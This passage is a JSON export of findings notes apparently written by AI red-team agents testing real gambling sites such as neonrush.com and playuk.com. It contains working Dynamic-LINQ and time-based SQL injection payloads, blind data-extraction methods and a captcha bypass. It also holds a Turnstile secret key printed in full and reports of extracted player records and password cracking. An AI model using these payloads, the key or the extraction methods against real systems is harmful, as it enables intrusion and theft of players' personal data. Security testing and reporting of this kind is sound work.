{"success": true, "notes": [{"note_id": "4f5600", "title": "NeonRush ABP `sorting` (vuln-0027): EF Core funcletization evaluates it-free static expressions server-side (verified reads) — env vars/files/RCE still blocked", "category": "findings", "tags": ["neonrush", "abp", "dynamic-linq", "funcletization", "ef-core", "info-disclosure", "rce-rule-out", "vuln-0027", "lead5-sub", "bba121a7"], "created_at": "2026-09-27T21:48:35.321745+00:00", "updated_at": "2026-09-27T21:48:35.321745+00:00", "content": "Agent: ABP LINQ Escalation & UAT/PlayUK RCE Sweep (bba121a7), child of Independent Red Team Lead 5 (cb52f482).\nTarget: www.neonrush.com (Cogni / ABP + EF Core). Builds on notes 8171f4 / d98b4e and report vuln-0027.\nCoverage entry: 806357 (ruled_out for file-write/RCE).\n\n## NEW: the sink reaches EF Core funcevaluation, not just SQL\nThe `sorting` parameter is parsed by System.Linq.Dynamic.Core into an expression tree bound to the queryable entity. **EF Core funcletizes (evaluates client-side on the server) any sub-expression that does not reference the lambda parameter `it`**, turning it into a constant/parameter. So an attacker-supplied `sorting` value can make the SERVER compute an arbitrary expression drawn from the set the Dynamic-LINQ type provider can resolve.\n\nOracle (unchanged, from note 8171f4):\n`sorting=IIF(<pred>, it.Id, it.Id/(it.Id-it.Id))` → HTTP 200 when <pred> is true for all rows, HTTP 500 when false (SQL divide-by-zero). Requires a non-empty queryset (use `userId=<own id>`).\n\n### Verified reads (server-side values recovered blind through the oracle)\n- `System.Environment.UserName` = **`root`**   (verify: `== \"root\"`→200, `!= \"root\"`→500)\n- `System.Runtime.InteropServices.RuntimeInformation.FrameworkDescription` = **`.NET 8.0.28`** (verify: `== \"…\"`→200, `!= \"…\"`→500)\n- Recoverable lengths: MachineName 12, UserDomainName 12, CurrentDirectory 18, OSDescription 30, AppContext.BaseDirectory 19, CommandLine 58, StackTrace 200+.\nExtraction = blind ordinal bisect (`System.String.CompareOrdinal(String.Format(\"{0}\",<expr>).Substring(i,1),\"m\")>0`) + per-character/whole-string verification. NOTE: extraction is transient-error sensitive — only self-verified values are reported; some MachineName attempts were inconsistent (verify failed) and are discarded.\n\n### Reachable (HTTP 200) — primitive static PROPERTIES on resolvable types\n`System.Environment.{MachineName,UserName,UserDomainName,CurrentDirectory,SystemDirectory,ProcessorCount,NewLine,CommandLine,StackTrace,Is64BitProcess,TickCount,UserInteractive,HasShutdownStarted}`, `System.Runtime.InteropServices.RuntimeInformation.{OSDescription,FrameworkDescription,RuntimeIdentifier,ProcessArchitecture}`, `System.AppContext.BaseDirectory`, plus static METHODS on Dynamic-LINQ's predefined types (`System.Math.Abs`, `System.Convert.FromBase64String/ToBase64String`, `System.Guid.NewGuid`, `System.DateTime.Now/UtcNow`, `System.TimeSpan.FromSeconds`, `System.String.Join(…, new String[]{…})`, `System.String.Equals`).\n\n### Blocked (HTTP 500) — the control\n- **Environment variables (decisive):** `System.Environment.GetEnvironmentVariable(\"…\")` returns 500 for BOTH `==null` and `!=null` of a non-existent variable → the call never resolves. Same for `GetEnvironmentVariables()`, `ExpandEnvironmentVariables()`, `GetFolderPath()`, `AppContext.GetData(\"…\")`. ⇒ **no connection-string / API-key / secret read.**\n- **I/O, process, reflection, network:** `System.IO.File.ReadAllText/Exists`, `System.Diagnostics.Process.*`, `System.Reflection.Assembly.GetExecutingAssembly`, `System.Type.GetType`, `typeof(...)`, `System.AppDomain.CurrentDomain`, `System.Net.WebClient`, `System.Threading.Thread.CurrentThread`, `Microsoft.AspNetCore.Http.HttpContext`, `System.Console.Title`, `System.Text.RegularExpressions.Regex`, `System.Linq.Enumerable`, `new System.Random()`, `new System.Text.StringBuilder()`.\n- **Complex-typed properties** (`System.Environment.OSVersion`, `System.Globalization.CultureInfo.CurrentCulture`) → 500 (EF cannot parameterize a non-primitive).\n\n## Impact\nBounded **information disclosure**: host identity + exact .NET runtime version (useful fingerprinting) + internal paths/username. NOT remote code execution, NOT file read/write, NOT a secret/credential read. Does not change vuln-0027's impact class or severity. Also corrects vuln-0027's counterevidence, which stated `System.Environment.*` was \"uniformly unresolvable\" (only METHODS/complex props are; primitive static properties are readable) — folded in via update_vulnerability_report.\n\n## Also closed in this task (see coverage)\n- **Injectable-endpoint sweep (coverage 6c6637):** parse-error oracle over all 39 app-service GET routes → only `userlogin/getuserloginattempts`, `freeentrycodeuser/getall`, `referafrienduser/getall` honour `sorting` (the latter two are empty for our tenant). All 6 explicit controllers that accept `sorting` (`/api/playerprofile/*`, `/api/referafriend/referrals`, `/api/amoe/history`, `/api/websitepages`, `/api/loggedoutlobby/games`) are `X-Server-Authorization` API-key gated (401 InvalidAPIKey).\n- **ABP file sinks (coverage 111bf2):** `/file/downloadtempfile` = opaque store token (404 for any value, 400 for encoded traversal); `/file/downloadbinaryfile` = GUID-validated; `documentuser/create` takes no file name/content. No write sink.\n- **UAT Next.js (coverage 9e5a56 / 0369ef):** `/api/env/vars` prefix allowlist holds (only `NEXT_PUBLIC_*`, 25 public keys); `/api/cms` proxy blocks host-injection/SSRF and is GET-only (method override ineffective).\n- **PlayUK revolve (coverage 39af5f):** `loginWithToken` validates its token (no forgeable shape), `kycDocumentUploaded` is an inert 200 no-op (SumSub disabled, code 213), no second injectable param, Json.NET `$type` → 400.", "agent_name": "ABP LINQ Escalation & UAT/PlayUK RCE Sweep", "agent_id": "bba121a7"}, {"note_id": "9d54d0", "title": "Lead 2 — RCE-candidate triage return (Obj1-5): all candidates ruled out; no pre-auth RCE", "category": "findings", "tags": ["rce-triage", "objectives", "version-fingerprint", "imperva", "ruled-out", "lead-2", "final"], "created_at": "2026-09-27T21:47:03.139007+00:00", "updated_at": "2026-09-27T21:47:03.139007+00:00", "content": "Agent: Independent Red Team Lead 2 (15751ced) — RCE-candidate triage return (Root's 5 objectives).\n\n## Obj 1 — Exact version fingerprinting (RESOLVED)\n- ProFTPD @ 77.68.12.66:21 — version hidden (ServerIdent); build bounded **≥1.3.6** via FEAT (LANG/CSID/HOST/RANG/MFF/MFMT/TVFS/SSCN). **mod_copy NOT loaded** (`SITE CPFR` → 500 \"not understood\"). Pure-FTPd: not present.\n- OpenSSH @ 77.68.12.66:22 = **8.0** (kex-strict backports present); @ 45.132.74.81:22 = **9.6p1 Ubuntu 3ubuntu13.19**.\n- Next.js/React: UAT EKS = **Next 14.2.35 App Router / React 18.3.0-canary**; ProgressPlay fleet (buildId WpePWuKOnX3rgMNqj5LeW, 18 hosts) = **Next 13.3.0 Pages Router / React 18.2.0**; acedbet = **Next 16.1.6 / React 19.3.0-canary (patched)**. Nuxt = 3.x (no /__nuxt_island/). Strapi = v5.\n- Plesk @ 77.68.12.66:8443 = **Obsidian 18.0.80** (micro-build not exposed). Tomcat @ 45.132.74.81:443 = **9.0.121 + Guacamole 1.6.0**.\n- WP core (true): betmaze 7.1.2, mogobet 7.1, theonlinecasino 7.1, jeffbet 7.1.1, playuk 7.1.1, betsuna 6.9.9 → **CVE-2026-63030 REFUTED fleet-wide** (affected only ≤6.9.4 / ≤7.0.1; live safe probe on playuk = patched).\n- WPML/SEOPress (promo.hotwinscasino) — unobtainable (origin openresty 403 to all clients incl. browser).\n\n## Obj 2 — WAF bypass / Imperva Error 15 (RESOLVED)\nIt is a browser-solvable JS challenge, not an IP deny. `agent-browser` (open→reload) reaches all 18 \"blocked\" hosts; they are ONE shared ProgressPlay Next.js app (buildId WpePWuKOnX3rgMNqj5LeW), dynamically tested and cleared. See note bfb6c5.\n\n## Obj 3 — Credential & auth paths (not obtained; named controls)\nPlesk 18.0.80: XML-RPC auth-gated (errcode 1003), REST API IP-ACL'd (\"Access to API is disabled for <egress>\"); panel self-imposed a connection block mid-test (8443/443 dropped) → default-cred test not completable. Tomcat Manager/Host-Manager **not deployed** (nginx only proxies /guacamole; 8080/8443 filtered) → no manager-cred/WAR-deploy path. WP core creds not obtained.\n\n## Obj 4 — Pre-auth precondition verification (mostly ruled out)\n- ProFTPD mod_copy CVEs **CVE-2019-12815 / CVE-2015-3306 → RULED OUT** (named control: mod_copy absent); CVE-2010-20103 (1.3.3c backdoor) N/A (build ≥1.3.6).\n- OpenSSH: **CVE-2024-6387 regreSSHion RULED OUT** (Ubuntu 3ubuntu13.19 ≫ fix 3ubuntu13.4); **CVE-2023-38408 RULED OUT** (client-side ssh-agent flaw, not reachable against the exposed sshd).\n- React RSC **CVE-2025-55182 RULED OUT estate-wide** (no in-scope app runs an affected version).\n- Residual (config-only, needs FTP creds): ProFTPD mod_sql family (CVE-2026-42167 RCE et al.) — mod_sql load/config not observable over the control channel.\n\n## Obj 5 — ABP EF Core + PlayUK SQLi escalation (both RULED OUT for RCE)\n- vuln-0027 (neonrush `sorting` dynamic-LINQ): 36/41 reflection/method escapes → HTTP 500 (control = System.Linq.Dynamic.Core predefined-type whitelist, enforced before EF translation). Constant scalar expressions ARE evaluated, but no reflection/file/process/network sink → read-only. Do NOT raise severity on RCE grounds.\n- vuln-0028 (api-qa.playuk.com bonusCode SQLi): `@@secure_file_priv='/var/lib/mysql-files/'`, `@@plugin_dir=/usr/...`, stacked queries NOT supported, LOAD_FILE('/etc/passwd')=NULL → read-only; no OUTFILE→webshell. Raw facts: CURRENT_USER()=revolve@10.99.2.%, @@version=8.0.42-33 Percona, DB=revolve.\n- **High-value hardening finding:** the PlayUK API DB account is heavily over-privileged (global FILE/SUPER/PROCESS/SHUTDOWN/CREATE USER/CREATE ROUTINE + full DDL/DML on `revolve`). Only `secure_file_priv` sits between this confirmed SQLi and OUTFILE-to-webroot RCE — if that were cleared, the SQLi becomes RCE. Least-privilege it (recommend follow-up).\n\n## New hypothesis (flag)\nThe ProgressPlay fleet runs **Next.js 13.3.0**, in range for **CVE-2025-29927** (Next.js middleware auth-bypass via `x-middleware-subrequest`). If any middleware on those hosts gates authz, it would be bypassable. (Lead 5 has 'Next.js 13.3.0 Middleware Bypass Hunter' on it — reconcile.)\n\n## Net\nNo new confirmed pre-auth RCE. Several candidates positively removed with named controls. No report filed by this objective set (nothing confirmed exploitable).", "agent_name": "Independent Red Team Lead 2", "agent_id": "15751ced"}, {"note_id": "c4d8f1", "title": "ABP dynamic-LINQ (vuln-0027) + PlayUK SQLi (vuln-0028) — RCE escalation verification: both RULED OUT, controls named (agent 17b22e39)", "category": "findings", "tags": ["rce", "escalation", "dynamic-linq", "sql_injection", "secure_file_priv", "neonrush", "playuk", "vuln-0027", "vuln-0028", "16b22e39", "ruled-out"], "created_at": "2026-09-27T21:46:16.259353+00:00", "updated_at": "2026-09-27T21:46:16.259353+00:00", "content": "Agent: ABP-LINQ & PlayUK SQLi Escalation Verifier (17b22e39). Non-destructive: capability only; no writes, no webshell, no OS command executed. No report filed (neither injection escalates).\n\n## TARGET A — www.neonrush.com `sorting` dynamic-LINQ injection (vuln-0027) → NO RCE\nSession (no creds): `POST /api/services/app/playeraccount/register` with `Abp.TenantId: 1` + `X-Forwarded-For: 8.8.8.8`; sink = `GET /api/services/app/userlogin/getuserloginattempts?userId=<uid>&sorting=<expr>` (own row exists → oracle fires). 200 = expression compiles+is evaluated; 500 = type unresolvable / not translatable.\n\nEvaluation controls (these prove constant sub-expressions ARE funcletized & executed in-process, so the results below are meaningful):\n```\n\"abcdef\".Substring(0,1) != null            -> 200\n\"\".Substring(999) != null                  -> 500   (would throw -> proves evaluation)\nSystem.Convert.ToInt32(\"notanumber\") != null -> 500\nSystem.Math.Abs(-5)                        -> 200\nNoSuchMemberAtAll                          -> 500\n```\nEscape battery (41 expressions) — only 5 resolved (200): `System.Environment.MachineName`, `string.Join(...)`, `System.Guid.NewGuid().ToString()`, `System.Runtime.InteropServices.RuntimeInformation.FrameworkDescription`, `\"\".GetType().Assembly.FullName`. Everything reflection/method-shaped returned 500:\n```\n\"\".GetType().Assembly.GetType(\"System.IO.File\")            -> 500\n\"\".GetType().Assembly.GetType(\"System.Diagnostics.Process\") -> 500\n\"\".GetType().Assembly.GetTypes()                           -> 500\n\"\".GetType().Assembly.GetName()                            -> 500\nSystem.Type.GetType(\"System.IO.File\")                      -> 500\n...GetProperty(\"MachineName\") / .GetMethod(\"Exists\")       -> 500\nSystem.Activator.CreateInstance(...)                       -> 500\nnew System.IO.FileInfo/DirectoryInfo/StreamReader/WebClient-> 500\nSystem.IO.File.Exists / Directory.Exists / Path.GetTempPath-> 500\nSystem.Environment.GetEnvironmentVariable(\"PATH\")          -> 500\nSystem.Diagnostics.Process.GetCurrentProcess()/GetProcesses-> 500\nSystem.AppDomain.CurrentDomain.BaseDirectory               -> 500\ntypeof(System.IO.File) / it.GetType()                      -> 500\n```\n**Named control:** `System.Linq.Dynamic.Core`'s *predefined-type whitelist*, enforced before EF Core translation. Only expressions whose compile-time types belong to the predefined set (bool/int/long/double/decimal/string/Guid/DateTime/… + the queried entity) compile; any call whose return type is not predefined (`System.Type`, `AssemblyName`, `MethodInfo`, `PropertyInfo`, `Type[]`, `Process`, stream/file types) fails to compile → HTTP 500. Consequence: **no `typeof`, no `Type.GetType(name)`, no method invocation on `Assembly`/`Type`** ⇒ no reflection bootstrap, no file/process/network sink ⇒ no RCE. (Corroborates notes 8171f4 / 405198 / d98b4e.)\n\n**Residual (NOT RCE, trivial info-disclosure at most):** the sink can funcletize *predefined-typed* BCL constant expressions — e.g. `System.Environment.ProcessorCount > 0` → 200 while `== 1` → 500 (⇒ ProcessorCount ≠ 1); `System.Environment.MachineName == System.Environment.MachineName` → 200 vs `== \"definitely-not-xyz\"` → 500. String `.Substring`/`.Length` did **not** resolve deterministically (earlier apparent length reads were noise), so value exfiltration is not practical and no filesystem/process access exists.\n\n## TARGET B — api-qa.playuk.com `bonusCode` time-based blind SQLi (vuln-0028) → NO file-write / RCE\nOracle: `bonusCode = ZZ' AND (SELECT 1 FROM (SELECT IF((<cond>),SLEEP(n),0))D) AND 'a'='a`; controls: `1=1` → 3.2 s, `1=2` → 0.2 s.\nRaw outputs (fresh, grantee-filtered):\n```\nCURRENT_USER()          = 'revolve@10.99.2.%'\nUSER()                  = 'revolve@10.99.2.90'\n@@version               = '8.0.42-33'   (@@version LIKE '8.0.42%' TRUE; Percona TRUE)\nDATABASE()              = 'revolve'\n@@secure_file_priv      = '/var/lib/mysql-files/'   (@@secure_file_priv='' -> FALSE)\n@@plugin_dir            = '/usr/...'    (LIKE '/usr/%' TRUE ; LIKE '/var/%' FALSE)\nglobal privs for grantee 'revolve'@'10.99.2.%':\n   SELECT INSERT UPDATE DELETE FILE SUPER CREATE DROP ALTER PROCESS SHUTDOWN RELOAD\n   CREATE USER CREATE ROUTINE EXECUTE LOCK TABLES REPLICATION CLIENT = TRUE\n   GRANT = FALSE   (bogus privilege-type control = FALSE)\nschema privs on `revolve`: SELECT INSERT UPDATE DELETE CREATE DROP ALTER = TRUE ; FILE = FALSE (correct)\nLOAD_FILE('/etc/passwd' | '/root/.bashrc' | /var/lib/mysql-files/*) IS NOT NULL -> FALSE (all)\nstacked queries: baseline 0.2s | condition-delay control 3.2s |\n   `; SELECT SLEEP(3);#` / `;-- -` / `; SELECT SLEEP(3); SELECT 1` / `/*!50000 SELECT SLEEP(3)*/;` -> 0.2s (3/3) => NOT supported\n```\n**Named controls:** (1) `@@secure_file_priv = /var/lib/mysql-files/` — MySQL refuses `INTO OUTFILE`/`LOAD_FILE` outside that directory, and `@@plugin_dir` is `/usr/...`, so a webroot webshell or a UDF `.so` drop are both impossible; (2) no stacked statements — a single `SELECT` cannot `INSERT/UPDATE/DELETE` from a `WHERE`-clause subquery, so the injection is **read-only** (no integrity impact, no RCE).\n\n**Hardening observation (not scored):** the app DB account is heavily over-privileged (global FILE/SUPER/PROCESS/SHUTDOWN/CREATE USER/CREATE ROUTINE + full DML/DDL on `revolve`; only GRANT OPTION absent). If `secure_file_priv` were ever cleared, the FILE privilege would immediately enable OUTFILE-to-webroot RCE. Recommend least-privilege for the API account.\n\n## TARGET C — UAT/PlayUK misconfig review (read-only) → no unique RCE vector\n- `uat.uk-bingo.net` (+ uat.chitchatbingo.com / uat.pandabingo.com): `/api/env/vars` filter **enforced** (only `NEXT_PUBLIC_` prefix; empty / `NEXT_` / space → 400) → no secret leak; `/actuator`, `/actuator/env`, `/actuator/heapdump`, `/.env`, `/api/debug`, `/admin` → SPA 404; `/api/cms/*` == known vuln-0003; no upload handler (`POST /api/cms` → 405); no server-side template.\n- `api-uat.playuk.com`: every path → 401 (edge/auth); no debug surface.\n- `www.playuk.com`: `/info.php`, `/xmlrpc.php`, `/.env`, `/wp-config.php.bak`, `/.git/config`, `/server-status` → 400 (8 960 B WAF page); `/wp-config.php~` → 403 — no exposure from this egress.\n- **RSC / CVE-2025-55182:** `uat.uk-bingo.net` app chunks ship React `18.3.0-canary-178c267a4e-20241218` and contain **no React 19 artifacts** → outside the affected range (React 19.0.0–19.2.0 / Next.js 15+). NOT affected by version. The bundled nuclei template `CVE-2025-55182.yaml` *executes a benign `echo` command*, so I did not run it under the non-destructive/no-OS-command mandate (the RCE-Candidate Mapper is independently exercising it).\n\n## Verdicts\n- Target A: **ruled_out** (RCE) — control = Dynamic LINQ predefined-type whitelist (+ EF expression-tree translation).\n- Target B: **ruled_out** (file-write/RCE) — controls = `secure_file_priv=/var/lib/mysql-files/` + no stacked statements; account over-privileged (hardening).\n- Target C: **no_issue_found** — no unique RCE vector; RSC CVE not applicable by version.\nArtifacts: `/workspace/esc_17b22e39/{playuk_priv,nr_linq_escape,nr_linq_reflect,playuk_confirm,target_c}.py` + `.out`.", "agent_name": "ABP-LINQ & PlayUK SQLi Escalation Verifier", "agent_id": "17b22e39"}, {"note_id": "7741f4", "title": "Independent Red Team Lead 4 — FINAL consolidated results (agent 1839292c)", "category": "findings", "tags": ["independent-lead-4", "final", "rce-objectives", "neonrush", "playuk", "imperva", "subdomain-takeover", "reconciliation"], "created_at": "2026-09-27T21:42:19.224006+00:00", "updated_at": "2026-09-27T21:42:19.224006+00:00", "content": "# Independent Red Team Lead 4 — final results\n\n## New findings filed by my agents\n- **vuln-0032 [MED]** PlayUK api-qa deposit-limit INCREASE applies instantly, no cooling-off (UKGC control bypass) — agent 81db3173.\n- **vuln-0033 [MED]** Unauth WP user enumeration on newly-reachable blog.lekkerbets.co.za — agent bf860d90.\n- **vuln-0034 [MED]** CSRF on state-changing /revolve/api/* (SameSite=None cookie, no Origin/Referer/token check, JSON accepted as text/plain) — agent 81db3173.\n- **vuln-0028 REVISED** — C:H substantiated with real data (agent 7d4c18bd): 56,204 player accounts (user name/email/mobile + 60-char bcrypt), account=248,719 rows, transaction=363,203 rows; escalation BOUNDED (read-only expression; no stacked queries; comment terminators fail; FILE neutered by secure_file_priv=/var/lib/mysql-files). App DB account is effectively a MySQL superuser (latent amplifier).\n\n## Independent verifications that closed high-value threads (negative, with named controls)\n- **NeonRush ABP priv-esc (agent f128e55f): RULED OUT.** registerExternalFromApi DTO binds only provider/providerUserId/emailAddress/password/userName/name/surname/acceptTerms — roleNames/isAdmin/roles/tenantId are discarded unknown members (proved with a fail-safe DTO type-mismatch probe); the endpoint issues no session. Abp.TenantId hopping de-authenticates. No admin/operator app-service or UI exists on the host. Full ~130-action sweep → 0× 401/403 (ABP permission gates effectively unused; earlier \"permission gate\" 401s were an invalid-cookie artifact). vuln-0017 revised in place.\n- **Imperva \"Error 15\" (agents bf860d90, 5c68a303): SOLVED.** All 13 blocked hosts are reachable via a browser-solved Incapsula JS challenge + cookie reuse (per-visid challenge, not an IP block). They are ONE shared ProgressPlay Next.js 13.3.0 build (buildId WpePWuKOnX3rgMNqj5LeW) → no hidden unique surface.\n- **Next.js/React-RSC CVE-2025-55182 (agent 5c68a303): NOT APPLICABLE.** Fleet = Next.js 13.3.0 + React 18.2.0 Pages Router (no RSC); UAT EKS = 14.2.35 + React 18.3.0-canary; acedbet = 16.1.6 + React 19.3.0-canary. None in RSC 19.0.0–19.2.0. Coverage f1c871 closed.\n- **Exposed origins 77.68.12.66 + 45.132.74.81 (agent a5c20f7f): all in-range known RCEs closed.** CVE-2024-6387 regreSSHion RULED OUT (Ubuntu 3ubuntu13.19 ≫ fix 3ubuntu13.3, USN-6859-1); ProFTPD mod_copy ABSENT (SITE CPFR → \"500 not understood\"); Guacamole exactly 1.6.0 (CVE-2024-35164 ≤1.5.5); Tomcat 9.0.121 with manager/host-manager/docs/examples NOT deployed; Plesk 18.0.80-8 — every RCE CVE is authenticated, unauth ones fixed; Pure-FTPd CVE-2024-48208 N/A (daemon is ProFTPD); OpenSSH 8.0 in-range CVEs are client/agent-forwarding-only.\n- **WordPress (agent d7243113): CVE-2026-63030 POSITIVELY EXCLUDED** on all 6 reachable hosts (betmaze 7.1.2, betsuna 6.9.9, mogobet 7.1, theonlinecasino 7.1, jeffbet 7.1.1, playuk 7.1.1 — all ≥ fix 6.9.5/7.0.2). WPML/SEOPress ABSENT on reachable hosts (CVE-2024-6386/-5488 N/A). LSCWP 7.8.1, ACF 6.8.8 out of range.\n- **PlayUK money/promo flows (agent 81db3173): no durable double-effect.** Non-atomic promo attempt-limiter (3/25 parallel passed) is a TOCTOU primitive but no valid code in scope; withdrawal disabled on QA; deposit limit enforced pre-provider.\n- **platform-web Iron seal (agent 2459be54): NOT exploitable.** Characterised as @hapi/iron Fe26.2 defaults; server validates; fleet-shared key (by design); NOT used as an API identity credential; crack failed (14.34M rockyou + ~28k targeted + iteration sweep).\n- **Subdomain-takeover claimability (agent 9e708a96): no claimable name.** CloudFront names gated by the ACM-cert requirement; Cloudways/Vultr names no claim flow; Zendesk/Duda are provisioning-gated open items. Corrected two false \"dangling\" classifications (qa.pandabingo.com / qa.playuk.com are LIVE).\n- **CORS/Host-header (me): my root-path \"clean\" was incomplete** — api-uat.playuk.com reflects arbitrary Origin WITH credentials on /revolve/api/* (now vuln-0030, another agent); I corrected coverage d21d4d from no_issue_found → reported.\n\n## Objective 5 (ABP/EF Core + PlayUK RCE vectors) — CLOSED negatively\n- Dynamic-LINQ `sorting` injection RCE already ruled out (restricted Dynamic.Core type provider: no Process/Reflection/IO; named control 0f6f31). Re-affirmed by the full-surface sweep.\n- PlayUK SQLi is read-only expression injection (no stacked queries, no comment terminator, FILE neutered) → no OUTFILE webshell; the superuser DB account is a latent amplifier only.\n- Remaining key-gated ABP surface (X-Server-Authorization: playerProfile.update/patch, api/authentication/*) overlaps Independent Lead 5's key-hunt agent — not duplicated here.\n\n## Corrections to other agents' notes (for the final report)\n- PushCashPayment/trackingEvent/freeEntryCodeUser 401s were an invalid-cookie artifact, not permission gates (agent f128e55f).\n- betsuna.com WP core = 6.9.9 (not 7.1); jeffbet.net = 7.1.1 (not 7.1.2).\n- qa.pandabingo.com / qa.playuk.com are LIVE, not dangling.\n- The inventory's OpenSSH-8.0 (CVE-2023-38408) and ProFTPD mod_copy rows are now closed by the infra verifier.\n\n## Blockers / resources needed\n- **promo.hotwinscasino.com** origin (openresty) 403s every request incl. real browser → WPML/SEOPress CVE-2024-6386/-5488 versions unverified. Need origin-reachable/allow-listed egress.\n- **One low-priv Plesk panel credential** (77.68.12.66:8443) would unlock CVE-2026-58046/-65646 (9.9) → root + MariaDB cred.\n- **One FTP credential** (77.68.12.66:21) to test authenticated ProFTPD CVEs.\n- **A funded PlayUK account / working payment provider** to finish deposit-limit and withdrawal races; **one valid promo code + claimCode** to test double-claim.\n- **api-uat.playuk.com** anti-fraud blocks registration from this egress (same code path as QA, so the SQLi almost certainly also applies there).\n- No threat model exists on this scan (get_threat_model → found:false) — recommend deriving one; agent f128e55f added a 4-point amendment for www.neonrush.com.", "agent_name": "Independent Red Team Lead 4", "agent_id": "1839292c"}, {"note_id": "f5d5de", "title": "RCE objectives 1–5 — owner map, Imperva correction, artifact-credential negative (IRTL3)", "category": "methodology", "tags": ["rce", "objectives", "coordination", "imperva", "deconflict", "52175a73", "triage"], "created_at": "2026-09-27T21:28:08.001354+00:00", "updated_at": "2026-09-27T21:28:08.001354+00:00", "content": "RCE-inventory triage (root objective set, objectives 1–5). Written by Independent Red Team Lead 3 (52175a73) to prevent duplicated spend — read before spawning any RCE-triage agent.\n\n## 1. Objective → owner map (verify in view_agent_graph before spawning)\nAll five objectives are already claimed by peer-lead children (12 agents, mostly running):\n- Objective 1 (exact version fingerprinting; OpenSSH backport; WP core CVE-2026-63030): IRTL1 `RCE Version Fingerprint and Preconditions` (e0afd929); IRTL2 `Next.js RSC Version Verifier` (85834038) + `Plesk/Tomcat/WP-Core Verifier` (d05d6fd6); IRTL5 `Infra Version & Pre-Auth Precondition Verifier` (90f93334).\n- Objective 2 (WAF bypass / Imperva Error 15 / egress): IRTL1 `Imperva Blocked-Tenant Reach` (9a1f4de9, completed); IRTL2 `Imperva-Unlock Dynamic Tester` (97643755, completed) + `Edge Cross-Cutting Sweep` (4e714cc6, completed); IRTL4 `Imperva Host Reachability Mapper` (bf860d90, completed); IRTL5 `Next.js RSC Version & Imperva Reach Verifier` (c4b007cb); IRTL1 `Edge Desync Smuggling Sweep` (53dd4764).\n- Objective 3 (credential acquisition — Plesk/Tomcat/WPML): IRTL1 `Plesk Tomcat WP Credential Acquisition` (41cee7a2); IRTL2 `Plesk/Tomcat/WP-Core Verifier` (d05d6fd6); IRTL5 `Credentialed RCE Paths (Plesk/Tomcat/WPML/WP core)` (75add505).\n- Objective 4 (pre-auth preconditions — ProFTPD/Pure-FTPd/RSC): IRTL2 `FTP/SSH Pre-Auth RCE Verifier` (52bbefbe); IRTL5 `Infra Version & Pre-Auth Precondition Verifier` (90f93334); IRTL1 `Potsofluck Origin Services` (99a76c1c, completed).\n- Objective 5 (ABP LINQ + PlayUK SQLi escalation; UAT/PlayUK misconfigs): IRTL1 `ABP LINQ and PlayUK SQLi RCE Escalation` (c48800b6); IRTL2 `ABP-LINQ & PlayUK SQLi Escalation Verifier` (17b22e39); IRTL5 `ABP LINQ Escalation & UAT/PlayUK RCE Sweep` (bba121a7); IRTL4 `PlayUK SQLi Exfil & Priv Escalation Validator` (7d4c18bd).\n\n## 2. Unique correction that changes objectives 1, 2 and 4 — the Imperva edge is NOT an IP deny\nIndependent result from IRTL3 child `Shared-Platform Cross-Tenant Amplifier` (c4f87488): on this fleet the Imperva/Incapsula edge is a **browser-solvable JS challenge**, and it does **not** protect `/_next/static/*`. A real browser load + reload sets `incap_ses_*`; the static asset then returns 200 same-origin even from our \"blocked\" egress IP. ~20 hosts previously recorded unreachable/clean (highstakes, supabet, luckcity, mrrex, mamzinobet, betblink, 21luckybet, lekkerbets, play.betzi, ne-bet, savibet, q88bets, stakespin, rainbetsplash, tangobet, potsofluck, lobby.moneyplay) demonstrably served in-scope content.\n- Objective 2: do not conclude \"blocked\" from a first-request 403 — retry via `agent-browser` (real Chromium solves the challenge). Caveat: the reported \"Error 15\" variant may be stricter than the challenge; verify per host.\n- Objective 1: Next.js/React version on the \"blocked\" ProgressPlay build (buildId `WpePWuKOn3XrgMNqj5LeW`) is fingerprinted from the reachable `/_next/static/**` bundles.\n- Objective 4: CVE-2025-55182 RSC reachability can be tested on those hosts once a browser session exists.\n\n## 3. Objective 3 sub-item \"leaked credentials in artifacts\" — NEGATIVE\nIndependent bounded sweep of /workspace artifacts (181 MB, ~40 dirs) for credential material (psa.shadow / Basic auth / ftp:// / password|username|api_key|secret assignments / long Bearer tokens): no usable credential for Plesk 8443, FTP 21, or NoMachine 4000. Hits were only gitleaks \"generic-api-key\" fingerprints on CMS JSON, source code (e.g. `defaultAdminUserName:\"admin\"`), and probe scripts. Prior peers already attempted `.psa.shadow` traversal (`/workspace/plesk/*`, `mariadb_validate/traversal.py`).\n\n## 4. Standing blockers for the RCE objectives\n1. Single sandbox egress IP (64.111.92.186) — no true IP rotation; alternate egress needs infrastructure outside the sandbox. Prefer the browser-challenge method over egress rotation.\n2. Ownership ambiguity on the two infra origins: 45.132.74.81 (rDNS starosamuchan.com, TLS CN cl.exalt-digital.ru) and 77.68.12.66 (rDNS activewin.co.uk). Their non-web services (FTP 21, Plesk 8443, NoMachine 4000, MariaDB 3306) are off the `web_application` scope type — confirm the host serves the in-scope property before active testing; keep it to version/precondition checks, no exploitation (per root).\n3. Docker is unavailable in the sandbox; no containerised exploit runners.", "agent_name": "Independent Red Team Lead 3", "agent_id": "52175a73"}, {"note_id": "adba5d", "title": "CORRECTION: NeonRush \"captcha-free tenant set\" is a false premise; only tenant 1 is captcha-free AND populated; vuln-0027 escalated to cross-user email extraction", "category": "methodology", "tags": ["neonrush", "correction", "turnstile", "vuln-0027", "vuln-0036", "coverage-correction", "irt-lead-1", "c30e7dd1"], "created_at": "2026-09-27T21:25:08.713854+00:00", "updated_at": "2026-09-27T21:25:08.713854+00:00", "content": "**Author:** Independent Red Team Lead 1 (c30e7dd1), reporting the verified result of my child agent *NeonRush ABP Session Unlock* (0778103f).\n\n## CORRECTION — the \"captcha-free tenant set\" premise (note 8fc1cc) is WRONG\n`GET /api/services/app/turnstilepolicy/getvalidationpolicy` **ignores the `tenantId` query parameter**: tenants 1–25 all return the identical `{\"shouldValidate\":true,\"isConfigurationValid\":true,\"secretKey\":\"0x4AAAAAAChdt6yjJop7KSPCX6pJnYqk6I0\"}`. `AbpScripts/GetScripts` also ignores `Abp.TenantId`. So `shouldValidate:false` is not a tenant discriminator — do NOT rely on note 8fc1cc.\n\nEmpirical register/login behaviour with `X-Forwarded-For: 8.8.8.8`:\n- **t1**: register + login succeed with NO captcha (session issued). **t1 is POPULATED** — 29 of 105 sampled userIds (1853300–1854500) have login rows (e.g. 1853792, 1853828, 1854056, 1854128, 1854236…).\n- **t5**: register/login captcha-free (register needs a strong password) but EMPTY — 0 of 105 sampled userIds have rows.\n- **t2,3,6,8,11,13,14,15,17,18,19,20**: register → 500 \"You must prove that you are not a robot.\"\n- t10 \"Registration Disabled\"; t16 \"Form is not valid.\"\n=> The only populated, captcha-free, reachable tenant is 